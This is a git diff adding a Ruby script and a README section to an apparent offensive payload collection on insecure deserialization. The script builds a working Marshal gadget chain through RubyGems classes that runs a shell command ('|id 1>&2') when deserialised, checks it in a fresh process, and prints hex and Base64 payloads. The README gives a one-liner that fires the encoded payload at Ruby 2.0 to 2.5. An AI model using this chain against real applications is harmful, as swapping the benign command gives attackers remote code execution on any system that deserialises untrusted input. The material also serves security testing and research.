diff --git a/Insecure deserialization/Files/Ruby_universal_gadget_generate_verify.rb b/Insecure deserialization/Files/Ruby_universal_gadget_generate_verify.rb
new file mode 100644
index 00000000..b2fb3e5c
--- /dev/null
+++ b/Insecure deserialization/Files/Ruby_universal_gadget_generate_verify.rb	
@@ -0,0 +1,66 @@
+#!/usr/bin/env ruby
+
+class Gem::StubSpecification
+  def initialize; end
+end
+
+
+stub_specification = Gem::StubSpecification.new
+stub_specification.instance_variable_set(:@loaded_from, "|id 1>&2")
+
+puts "STEP n"
+stub_specification.name rescue nil
+puts
+
+
+class Gem::Source::SpecificFile
+  def initialize; end
+end
+
+specific_file = Gem::Source::SpecificFile.new
+specific_file.instance_variable_set(:@spec, stub_specification)
+
+other_specific_file = Gem::Source::SpecificFile.new
+
+puts "STEP n-1"
+specific_file <=> other_specific_file rescue nil
+puts
+
+
+$dependency_list= Gem::DependencyList.new
+$dependency_list.instance_variable_set(:@specs, [specific_file, other_specific_file])
+
+puts "STEP n-2"
+$dependency_list.each{} rescue nil
+puts
+
+
+class Gem::Requirement
+  def marshal_dump
+    [$dependency_list]
+  end
+end
+
+payload = Marshal.dump(Gem::Requirement.new)
+
+puts "STEP n-3"
+Marshal.load(payload) rescue nil
+puts
+
+
+puts "VALIDATION (in fresh ruby process):"
+IO.popen("ruby -e 'Marshal.load(STDIN.read) rescue nil'", "r+") do |pipe|
+  pipe.print payload
+  pipe.close_write
+  puts pipe.gets
+  puts
+end
+
+puts "Payload (hex):"
+puts payload.unpack('H*')[0]
+puts
+
+
+require "base64"
+puts "Payload (Base64 encoded):"
+puts Base64.encode64(payload)
\ No newline at end of file
diff --git a/Insecure deserialization/Ruby.md b/Insecure deserialization/Ruby.md
index 88b80fb2..eed99c44 100644
--- a/Insecure deserialization/Ruby.md	
+++ b/Insecure deserialization/Ruby.md	
@@ -1,6 +1,10 @@
 # Ruby Deserialization
 
-TODO
+Script to generate and verify the deserialization gadget chain against Ruby 2.0 through to 2.5
+
+```ruby
+for i in {0..5}; do docker run -it ruby:2.${i} ruby -e 'Marshal.load(["0408553a1547656d3a3a526571756972656d656e745b066f3a1847656d3a3a446570656e64656e63794c697374073a0b4073706563735b076f3a1e47656d3a3a536f757263653a3a537065636966696346696c65063a0a40737065636f3a1b47656d3a3a5374756253706563696669636174696f6e083a11406c6f616465645f66726f6d49220d7c696420313e2632063a0645543a0a4064617461303b09306f3b08003a1140646576656c6f706d656e7446"].pack("H*")) rescue nil'; done
+```
 
 ## Thanks